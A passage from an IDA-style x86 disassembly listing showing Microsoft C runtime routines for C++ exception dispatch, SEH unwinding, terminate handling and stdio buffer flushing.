arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_41A0EB
call sub_41A982
loc_41A0EB: ; CODE XREF: sub_41A0D5+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41A113
cmp dword ptr [esi+4], 0
jz short loc_41A169
cmp [ebp+arg_14], 0
jnz short loc_41A169
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41A41C
add esp, 10h
jmp short loc_41A169
; ---------------------------------------------------------------------------
loc_41A113: ; CODE XREF: sub_41A0D5+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41A169
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41A14D
cmp [eax+14h], edi
jbe short loc_41A14D
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41A14D
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41A16C
; ---------------------------------------------------------------------------
loc_41A14D: ; CODE XREF: sub_41A0D5+4A�j
; sub_41A0D5+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41A170
add esp, 20h
loc_41A169: ; CODE XREF: sub_41A0D5+23�j
; sub_41A0D5+29�j ...
push 1
pop eax
loc_41A16C: ; CODE XREF: sub_41A0D5+76�j
pop edi
pop esi
pop ebp
retn
sub_41A0D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A170 proc near ; CODE XREF: sub_41A0D5+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_41A190
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41A195
loc_41A190: ; CODE XREF: sub_41A170+16�j
call sub_41A982
loc_41A195: ; CODE XREF: sub_41A170+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_41A2EC
cmp dword ptr [esi+10h], 3
jnz short loc_41A209
cmp [esi+14h], edi
jnz short loc_41A209
cmp dword ptr [esi+1Ch], 0
jnz short loc_41A209
mov esi, dword_492864
test esi, esi
jz loc_41A2E7
mov eax, dword_492868
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_41E36A
pop ecx
test eax, eax
pop ecx
jnz short loc_41A1EB
call sub_41A982
loc_41A1EB: ; CODE XREF: sub_41A170+74�j
cmp [esi], ebx
jnz loc_41A2EC
cmp dword ptr [esi+10h], 3
jnz short loc_41A209
cmp [esi+14h], edi
jnz short loc_41A209
cmp dword ptr [esi+1Ch], 0
jnz short loc_41A209
call sub_41A982
loc_41A209: ; CODE XREF: sub_41A170+41�j
; sub_41A170+46�j ...
cmp [esi], ebx
jnz loc_41A2EC
cmp dword ptr [esi+10h], 3
jnz loc_41A2EC
cmp [esi+14h], edi
jnz loc_41A2EC
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41624C
add esp, 14h
mov ebx, eax
loc_41A240: ; CODE XREF: sub_41A170+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_41A2D7
cmp [ebx], edi
jg short loc_41A2CC
cmp edi, [ebx+4]
jg short loc_41A2CC
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_41A2C9
loc_41A265: ; CODE XREF: sub_41A170+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_41A296
loc_41A277: ; CODE XREF: sub_41A170+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_41A3BF
add esp, 0Ch
test eax, eax
jnz short loc_41A2A5
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_41A277
loc_41A296: ; CODE XREF: sub_41A170+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_41A265
jmp short loc_41A2C9
; ---------------------------------------------------------------------------
loc_41A2A5: ; CODE XREF: sub_41A170+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41A4D0
add esp, 2Ch
loc_41A2C9: ; CODE XREF: sub_41A170+F3�j
; sub_41A170+133�j
mov edi, [ebp+var_10]
loc_41A2CC: ; CODE XREF: sub_41A170+DE�j
; sub_41A170+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_41A240
; ---------------------------------------------------------------------------
loc_41A2D7: ; CODE XREF: sub_41A170+D6�j
cmp [ebp+arg_14], 0
jz short loc_41A2E7
push 1
push esi
call sub_41A845
pop ecx
pop ecx
loc_41A2E7: ; CODE XREF: sub_41A170+56�j
; sub_41A170+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A2EC: ; CODE XREF: sub_41A170+37�j
; sub_41A170+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_41A312
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41A317
add esp, 20h
jmp short loc_41A2E7
; ---------------------------------------------------------------------------
loc_41A312: ; CODE XREF: sub_41A170+180�j
jmp sub_41A91C
sub_41A170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A317 proc near ; CODE XREF: sub_41A170+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp dword_49286C, 0
push esi
push edi
jz short loc_41A348
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416123
add esp, 1Ch
test eax, eax
jnz short loc_41A3BB
loc_41A348: ; CODE XREF: sub_41A317+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41624C
add esp, 14h
mov esi, eax
loc_41A364: ; CODE XREF: sub_41A317+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41A3BB
cmp edi, [esi]
jl short loc_41A3B3
cmp edi, [esi+4]
jg short loc_41A3B3
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41A38D
cmp byte ptr [ecx+8], 0
jnz short loc_41A3B3
loc_41A38D: ; CODE XREF: sub_41A317+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A4D0
add esp, 2Ch
loc_41A3B3: ; CODE XREF: sub_41A317+57�j
; sub_41A317+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_41A364
; ---------------------------------------------------------------------------
loc_41A3BB: ; CODE XREF: sub_41A317+2F�j
; sub_41A317+53�j
pop edi
pop esi
leave
retn
sub_41A317 endp
; =============== S U B R O U T I N E =======================================
sub_41A3BF proc near ; CODE XREF: sub_41A170+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_41A416
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_41A416
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_41A3F0
add ecx, 8
push ecx
push edx
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_41A412
loc_41A3F0: ; CODE XREF: sub_41A3BF+1F�j
test byte ptr [esi], 2
jz short loc_41A3FA
test byte ptr [edi], 8
jz short loc_41A412
loc_41A3FA: ; CODE XREF: sub_41A3BF+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_41A409
test byte ptr [edi], 1
jz short loc_41A412
loc_41A409: ; CODE XREF: sub_41A3BF+43�j
test al, 2
jz short loc_41A416
test byte ptr [edi], 2
jnz short loc_41A416
loc_41A412: ; CODE XREF: sub_41A3BF+2F�j
; sub_41A3BF+39�j ...
xor eax, eax
jmp short loc_41A419
; ---------------------------------------------------------------------------
loc_41A416: ; CODE XREF: sub_41A3BF+B�j
; sub_41A3BF+14�j ...
push 1
pop eax
loc_41A419: ; CODE XREF: sub_41A3BF+55�j
pop edi
pop esi
retn
sub_41A3BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A41C proc near ; CODE XREF: .text:0041609F�p
; sub_41A0D5+34�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427738
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41A44E: ; CODE XREF: sub_41A41C+8A�j
cmp esi, [ebp+arg_C]
jz short loc_41A4A8
cmp esi, 0FFFFFFFFh
jle short loc_41A45D
cmp esi, [edi+4]
jl short loc_41A462
loc_41A45D: ; CODE XREF: sub_41A41C+3A�j
call sub_41A982
loc_41A462: ; CODE XREF: sub_41A41C+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41A47D
push 103h
push ebx
push eax
call sub_41A8D0
loc_41A47D: ; CODE XREF: sub_41A41C+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41A49D
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41A4BA
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41A49D: ; CODE XREF: sub_41A41C+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A4A8: ; CODE XREF: sub_41A41C+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41A41C endp
; =============== S U B R O U T I N E =======================================
sub_41A4BA proc near ; CODE XREF: sub_41A41C+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41A4CB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A4CB: ; CODE XREF: sub_41A4BA+C�j
jmp sub_41A91C
sub_41A4BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A4D0 proc near ; CODE XREF: sub_41A170+151�p
; sub_41A317+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_41A4F2
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_41A681
add esp, 10h
loc_41A4F2: ; CODE XREF: sub_41A4D0+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_41A4FE
push edi
jmp short loc_41A501
; ---------------------------------------------------------------------------
loc_41A4FE: ; CODE XREF: sub_41A4D0+29�j
push [ebp+arg_24]
loc_41A501: ; CODE XREF: sub_41A4D0+2C�j
call sub_41600B
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_41A41C
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_41A54B
add esp, 2Ch
test eax, eax
jz short loc_41A546
push edi
push eax
call sub_415FC2
loc_41A546: ; CODE XREF: sub_41A4D0+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41A4D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A54B proc near ; CODE XREF: sub_41A4D0+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427748
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, dword_492864
mov [ebp+var_1C], ecx
mov ecx, dword_492868
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov dword_492864, edi
mov ecx, [ebp+arg_8]
mov dword_492868, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_4160AA
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_41A611
mov eax, [ebp+var_2C]
loc_41A5D8: ; CODE XREF: sub_41A5F1+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41A54B endp
; =============== S U B R O U T I N E =======================================
sub_41A5E7 proc near ; DATA XREF: .rdata:00427758�o
push dword ptr [ebp-14h]
call sub_41A657
pop ecx
retn
sub_41A5E7 endp
; =============== S U B R O U T I N E =======================================
sub_41A5F1 proc near ; DATA XREF: .rdata:0042775C�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_41630A
pop ecx
pop ecx
xor eax, eax
jmp short loc_41A5D8
sub_41A5F1 endp
; =============== S U B R O U T I N E =======================================
sub_41A609 proc near ; DATA XREF: .rdata:00427750�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_41A609 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A611 proc near ; CODE XREF: sub_41A54B+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov dword_492864, eax
mov eax, [ebp-20h]
mov dword_492868, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_41A656
cmp dword ptr [edi+10h], 3
jnz short locret_41A656
cmp dword ptr [edi+14h], 19930520h
jnz short locret_41A656
cmp [ebp-24h], ebx
jnz short locret_41A656
cmp [ebp-2Ch], ebx
jz short locret_41A656
call sub_416372
push eax
push edi
call sub_41A845
pop ecx
pop ecx
locret_41A656: ; CODE XREF: sub_41A611+1C�j
; sub_41A611+22�j ...
retn
sub_41A611 endp
; =============== S U B R O U T I N E =======================================
sub_41A657 proc near ; CODE XREF: sub_41A5E7+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41A67E
cmp dword ptr [eax+10h], 3
jnz short loc_41A67E
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41A67E
cmp dword ptr [eax+1Ch], 0
jnz short loc_41A67E
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A67E: ; CODE XREF: sub_41A657+C�j
; sub_41A657+12�j ...
xor eax, eax
retn
sub_41A657 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A681 proc near ; CODE XREF: sub_41A4D0+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427760
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_41A82A
cmp byte ptr [eax+8], 0
jz loc_41A82A
mov eax, [ecx+8]
test eax, eax
jz loc_41A82A
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_41A71E
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_41E36A
pop ecx
pop ecx
test eax, eax
jz loc_41A821
push 1
push edi
call sub_41E386
pop ecx
pop ecx
test eax, eax
jz loc_41A821
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_41A70F: ; CODE XREF: sub_41A681+F5�j
push eax
call sub_41A8AC
pop ecx
pop ecx
mov [edi], eax
jmp loc_41A826
; ---------------------------------------------------------------------------
loc_41A71E: ; CODE XREF: sub_41A681+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_41A778
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_41E36A
pop ecx
pop ecx
test eax, eax
jz loc_41A821
push 1
push edi
call sub_41E386
pop ecx
pop ecx
test eax, eax
jz loc_41A821
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_416430
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_41A826
mov eax, [edi]
test eax, eax
jz loc_41A826
add esi, 8
push esi
jmp short loc_41A70F
; ---------------------------------------------------------------------------
loc_41A778: ; CODE XREF: sub_41A681+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_41A7C0
call sub_41E36A
pop ecx
pop ecx
test eax, eax
jz loc_41A821
push 1
push edi
call sub_41E386
pop ecx
pop ecx
test eax, eax
jz short loc_41A821
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_41A8AC
pop ecx
pop ecx
push eax
push edi
call sub_416430
add esp, 0Ch
jmp short loc_41A826
; ---------------------------------------------------------------------------
loc_41A7C0: ; CODE XREF: sub_41A681+103�j
call sub_41E36A
pop ecx
pop ecx
test eax, eax
jz short loc_41A821
push 1
push edi
call sub_41E386
pop ecx
pop ecx
test eax, eax
jz short loc_41A821
push dword ptr [esi+18h]
call sub_41E3A2
pop ecx
test eax, eax
jz short loc_41A821
test byte ptr [esi], 4
jz short loc_41A807
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41A8AC
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_416004
jmp short loc_41A826
; ---------------------------------------------------------------------------
loc_41A807: ; CODE XREF: sub_41A681+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_41A8AC
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_415FFD
jmp short loc_41A826
; ---------------------------------------------------------------------------
loc_41A821: ; CODE XREF: sub_41A681+6A�j
; sub_41A681+7C�j ...
call sub_41A982
loc_41A826: ; CODE XREF: sub_41A681+98�j
; sub_41A681+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_41A82A: ; CODE XREF: sub_41A681+2E�j
; sub_41A681+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41A681 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41A91C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A845 proc near ; CODE XREF: sub_41A170+170�p
; sub_41A611+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427770
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41A88C
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41A88C
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_415FF6
or [ebp+var_4], 0FFFFFFFFh
loc_41A88C: ; CODE XREF: sub_41A845+2A�j
; sub_41A845+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41A845 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_41A91C
; =============== S U B R O U T I N E =======================================
sub_41A8AC proc near ; CODE XREF: sub_41A681+8F�p
; sub_41A681+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_41A8CD
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41A8CD: ; CODE XREF: sub_41A8AC+12�j
pop esi
retn
sub_41A8AC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8D0 proc near ; CODE XREF: sub_4160AA+40�p
; sub_41A41C+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_416395
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_41A90F
mov ecx, 2
loc_41A90F: ; CODE XREF: sub_41A8D0+38�j
push ecx
call sub_416395
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_41A8D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A91C proc near ; CODE XREF: sub_41A170:loc_41A312�j
; sub_41A4BA:loc_41A4CB�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041E3BA SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427780
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, dword_492870
test eax, eax
jz short loc_41A964
mov [ebp+var_4], 1
call eax
jmp short loc_41A960
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A95D: ; DATA XREF: .rdata:00427794�o
mov esp, [ebp+var_18]
loc_41A960: ; CODE XREF: sub_41A91C+3B�j
and [ebp+var_4], 0
loc_41A964: ; CODE XREF: sub_41A91C+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41A96D: ; DATA XREF: .rdata:00427788�o
jmp loc_41E3BA
sub_41A91C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov eax, off_435C10
test eax, eax
jz short loc_41A97D
call eax ; sub_41A91C
loc_41A97D: ; CODE XREF: .text:0041A979�j
jmp sub_41A91C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A982 proc near ; CODE XREF: sub_41624C+23�p
; sub_41624C:loc_4162B7�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427798
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_435C14
test eax, eax
jz short loc_41A9CA
mov [ebp+var_4], 1
call eax ; sub_41A91C
jmp short loc_41A9C6
; ---------------------------------------------------------------------------
loc_41A9BF: ; DATA XREF: .rdata:004277A8�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A9C3: ; DATA XREF: .rdata:004277AC�o
mov esp, [ebp+var_18]
loc_41A9C6: ; CODE XREF: sub_41A982+3B�j
and [ebp+var_4], 0
loc_41A9CA: ; CODE XREF: sub_41A982+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_41A9D3: ; DATA XREF: .rdata:004277A0�o
jmp sub_41A91C
sub_41A982 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9D8 proc near ; CODE XREF: sub_4163D7+45�p
; sub_416821+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_41AAE1
test al, 40h
jnz loc_41AAE1
test al, 1
jz short loc_41AA10
and dword ptr [esi+4], 0
test al, 10h
jz loc_41AAE1
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_41AA10: ; CODE XREF: sub_41A9D8+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41AA4A
cmp esi, offset dword_436220
jz short loc_41AA38
cmp esi, offset dword_436240
jnz short loc_41AA43
loc_41AA38: ; CODE XREF: sub_41A9D8+56�j
push ebx
call sub_41E5C2
test eax, eax
pop ecx
jnz short loc_41AA4A
loc_41AA43: ; CODE XREF: sub_41A9D8+5E�j
push esi
call sub_41E57E
pop ecx
loc_41AA4A: ; CODE XREF: sub_41A9D8+4E�j
; sub_41A9D8+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41AAB7
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41AA7A
push edi
push eax
push ebx
call sub_41E3D1
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_41AAAD
; ---------------------------------------------------------------------------
loc_41AA7A: ; CODE XREF: sub_41A9D8+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_41AA95
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_493E60[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_41AA9A
; ---------------------------------------------------------------------------
loc_41AA95: ; CODE XREF: sub_41A9D8+A5�j
mov eax, offset dword_436130
loc_41AA9A: ; CODE XREF: sub_41A9D8+BB�j
test byte ptr [eax+4], 20h
jz short loc_41AAAD
push 2
push 0
push ebx
call sub_41CE78
add esp, 0Ch
loc_41AAAD: ; CODE XREF: sub_41A9D8+A0�j
; sub_41A9D8+C6�j
